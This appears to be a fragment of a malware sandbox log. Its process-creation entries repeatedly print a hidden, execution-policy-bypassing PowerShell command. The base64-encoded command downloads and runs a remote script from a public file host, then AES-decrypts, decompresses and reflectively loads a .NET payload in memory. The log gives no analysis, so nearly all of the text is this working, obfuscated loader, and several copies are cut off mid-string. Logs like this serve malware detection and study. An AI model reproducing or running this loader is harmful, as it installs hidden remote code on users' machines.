"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiB0Ym54ZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnOVZ1Sk54T3dDdTh6b1JRU2pyVi9XL2xObzVaR05qUW02SEZ6MXVoazRWUT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnY2pTTW92SXB3MGpxdUZpbDh4VFEvUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlbXVydSgkcGFyYW1fdmFyKXsJSUVYICckdWtjYWs9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2NraXk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkdWdzZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR1a2NhaywgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZHVnc2QuQ29weVRvKCRvY2tpeSk7CSRkdWdzZC5EaXNwb3NlKCk7CSR1a2Nhay5EaXNwb3NlKCk7CSRvY2tpeS5EaXNwb3NlKCk7CSRvY2tpeS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGluZmRlKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR0ZHFzcD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG5heXJxPSR0ZHFzcC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRuYXlycS5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JHNtaCA9ICRlbnY6VVNFUk5BTUU7JHZhbHhrID0gJ0M6XFVzZXJzXCcgKyAkc21oICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkdmFseGs7JG5zYnR1PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiB0Ym54ZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnOVZ1Sk54T3dDdTh6b1JRU2pyVi9XL2xObzVaR05qUW02SEZ6MXVoazRWUT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnY2pTTW92SXB3MGpxdUZpbDh4VFEvUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlbXVydSgkcGFyYW1fdmFyKXsJSUVYICckdWtjYWs9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2NraXk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkdWdzZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR1a2NhaywgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZHVnc2QuQ29weVRvKCRvY2tpeSk7CSRkdWdzZC5EaXNwb3NlKCk7CSR1a2Nhay5EaXNwb3NlKCk7CSRvY2tpeS5EaXNwb3NlKCk7CSRvY2tpeS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGluZmRlKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR0ZHFzcD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG5heXJxPSR0ZHFzcC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRuYXlycS5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JHNtaCA9ICRlbnY6VVNFUk5BTUU7JHZhbHhrID0gJ0M6XFVzZXJzXCcgKyAkc21oICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkdmFseGs7JG5zYnR1PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiB0Ym54ZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnOVZ1Sk54T3dDdTh6b1JRU2pyVi9XL2xObzVaR05qUW02SEZ6MXVoazRWUT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnY2pTTW92SXB3MGpxdUZpbDh4VFEvUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlbXVydSgkcGFyYW1fdmFyKXsJSUVYICckdWtjYWs9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2NraXk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkdWdzZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR1a2NhaywgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZHVnc2QuQ29weVRvKCRvY2tpeSk7CSRkdWdzZC5EaXNwb3NlKCk7CSR1a2Nhay5EaXNwb3NlKCk7CSRvY2tpeS5EaXNwb3NlKCk7CSRvY2tpeS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGluZmRlKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR0ZHFzcD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG5heXJxPSR0ZHFzcC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRuYXlycS5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JHNtaCA9ICRlbnY6VVNFUk5BTUU7JHZhbHhrID0gJ0M6XFVzZXJzXCcgKyAkc21oICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkdmFseGs7JG5zYnR1PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiB0Ym54ZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnOVZ1Sk54T3dDdTh6b1JRU2pyVi9XL2xObzVaR05qUW02SEZ6MXVoazRWUT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnY2pTTW92SXB3MGpxdUZpbDh4VFEvUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlbXVydSgkcGFyYW1fdmFyKXsJSUVYICckdWtjYWs9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2NraXk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkdWdzZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR1a2NhaywgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZHVnc2QuQ29weVRvKCRvY2tpeSk7CSRkdWdzZC5EaXNwb3NlKCk7CSR1a2Nhay5EaXNwb3NlKCk7CSRvY2tpeS5EaXNwb3NlKCk7CSRvY2tpeS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGluZmRlKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR0ZHFzcD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG5heXJxPSR0ZHFzcC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRuYXlycS5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JHNtaCA9ICRlbnY6VVNFUk5BTUU7JHZhbHhrID0gJ0M6XFVzZXJzXCcgKyAkc21oICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkdmFseGs7JG5zYnR1PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiB0Ym54ZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnOVZ1Sk54T3dDdTh6b1JRU2pyVi9XL2xObzVaR05qUW02SEZ6MXVoazRWUT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnY2pTTW92SXB3MGpxdUZpbDh4VFEvUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlbXVydSgkcGFyYW1fdmFyKXsJSUVYICckdWtjYWs9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2NraXk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkdWdzZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR1a2NhaywgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZHVnc2QuQ29weVRvKCRvY2tpeSk7CSRkdWdzZC5EaXNwb3NlKCk7CSR1a2Nhay5EaXNwb3NlKCk7CSRvY2tpeS5EaXNwb3NlKCk7CSRvY2tpeS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGluZmRlKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR0ZHFzcD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG5heXJxPSR0ZHFzcC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRuYXlycS5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JHNtaCA9ICRlbnY6VVNFUk5BTUU7JHZhbHhrID0gJ0M6XFVzZXJzXCcgKyAkc21oICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkdmFseGs7JG5zYnR1PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiB0Ym54ZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q